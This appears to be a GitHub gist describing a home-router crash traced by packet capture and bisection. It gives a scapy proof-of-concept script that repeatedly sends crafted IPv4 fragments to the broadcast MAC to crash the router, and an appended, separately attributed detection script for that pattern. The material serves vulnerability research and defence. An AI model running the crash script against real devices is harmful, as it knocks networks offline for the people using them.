@mmkhitaryan
Last active December 7, 2023 18:25

My router has been crashing when my PC boots, and starts working well after 5 minutes of restarting. So I decided to dig into the reasons for the crash.

I used tcpdump and made it start on system boot. It collected all the packets, and then I used tcpdump replay to try to reproduce the crashes.

When I replayed all the packets, the router crashed as suspected. But I needed to understand what specific packets were the reason for the crash.

So I started cutting the file in half (basically binary search) and seeing if the crash happens on. I ended up with ~20 packets, and then chose those packets that are in the scapy script.

I wanted to continue researching the reasons for the vulnerability, emulate the router firmware and try to crash it. But I did not find the router's working firmware anywhere.

```python
from scapy.all import *

for _ in range(100):
    # First fragment: offset 0, More Fragments set, 1472-byte payload
    first_new_packet = Ether(
        dst="ff:ff:ff:ff:ff:ff",  # works only with broadcast mac address
        src="70:85:c2:70:ce:0c",
        type="IPv4"
    )/IP(
        version=4,
        id=333,
        flags='MF',
        frag=0,
        proto="udp",
        src="192.168.1.113",
        dst="192.168.1.1",
    )/Raw(
        load=1472 * 'a'
    )
    sendp(first_new_packet)

    # Second fragment: same id, offset 184 * 8 = 1472 bytes, 1-byte payload
    new_second_packet = Ether(
        dst="ff:ff:ff:ff:ff:ff",  # works only with broadcast mac address
        src="70:85:c2:70:ce:0c",
        type="IPv4"
    )/IP(
        version=4,
        id=333,
        frag=184,
        proto="udp",
        src="192.168.1.113",
        dst="192.168.1.1"
    )/Raw(
        load=1 * 'b'
    )
    sendp(new_second_packet)
```
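A detection-side counterpart to the script above, as an added example that is not part of the original gist: it flags the pattern the script produces, an IPv4 fragment carried in a frame addressed to the Ethernet broadcast MAC while the IP destination is a unicast host. The /24 LAN, the MAC addresses in the samples and all function names are assumptions, and the sample frames are constructed.

```python
import struct
from ipaddress import IPv4Address, IPv4Network

BROADCAST_MAC = b"\xff" * 6
LAN = IPv4Network("192.168.1.0/24")  # assumption: LAN inferred from the gist's addresses
LIMITED_BCAST = IPv4Address("255.255.255.255")
IP_HDR = "!BBHHHBBH4s4s"  # fixed 20-byte IPv4 header, no options

def build_frame(dst_mac, src_ip, dst_ip, ident, mf, frag_units, payload):
    """Build a constructed Ethernet/IPv4 frame for testing (checksum left at 0)."""
    flags_frag = (0x2000 if mf else 0) | frag_units
    ip = struct.pack(IP_HDR, 0x45, 0, 20 + len(payload), ident, flags_frag,
                     64, 17, 0, IPv4Address(src_ip).packed,
                     IPv4Address(dst_ip).packed)
    return dst_mac + bytes.fromhex("020000000001") + b"\x08\x00" + ip + payload

def inspect(frame):
    """Return a finding for an IPv4 fragment sent to the broadcast MAC but
    addressed to a unicast IP; return None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None  # too short, or not IPv4
    ver_ihl, _, _, ident, flags_frag, _, proto, _, src, dst = struct.unpack(
        IP_HDR, frame[14:34])
    if ver_ihl >> 4 != 4:
        return None
    more_fragments = bool(flags_frag & 0x2000)
    offset_bytes = (flags_frag & 0x1FFF) * 8  # offset field counts 8-byte units
    dst_ip = IPv4Address(dst)
    l3_broadcast = (dst_ip in (LAN.broadcast_address, LIMITED_BCAST)
                    or dst_ip.is_multicast)
    is_fragment = more_fragments or offset_bytes > 0
    if frame[:6] != BROADCAST_MAC or not is_fragment or l3_broadcast:
        return None
    return {"src": str(IPv4Address(src)), "dst": str(dst_ip), "id": ident,
            "mf": more_fragments, "offset": offset_bytes, "proto": proto}

def scan(frames):
    """Run inspect() over an iterable of raw frames and keep the findings."""
    return [hit for hit in map(inspect, frames) if hit]

# Constructed sample frames: two matching the gist's pattern, two benign.
UNICAST_MAC = bytes.fromhex("020000000002")
SAMPLES = [
    build_frame(BROADCAST_MAC, "192.168.1.113", "192.168.1.1", 333, True, 0, b"a" * 1472),
    build_frame(BROADCAST_MAC, "192.168.1.113", "192.168.1.1", 333, False, 184, b"b"),
    build_frame(UNICAST_MAC, "192.168.1.113", "192.168.1.1", 7, True, 0, b"a" * 1472),
    build_frame(BROADCAST_MAC, "192.168.1.113", "255.255.255.255", 8, False, 0, b"x" * 300),
]
```

`scan(SAMPLES)` returns two findings, both with IP id 333, which is the kind of signal a switch ACL or IDS rule in front of the router could act on.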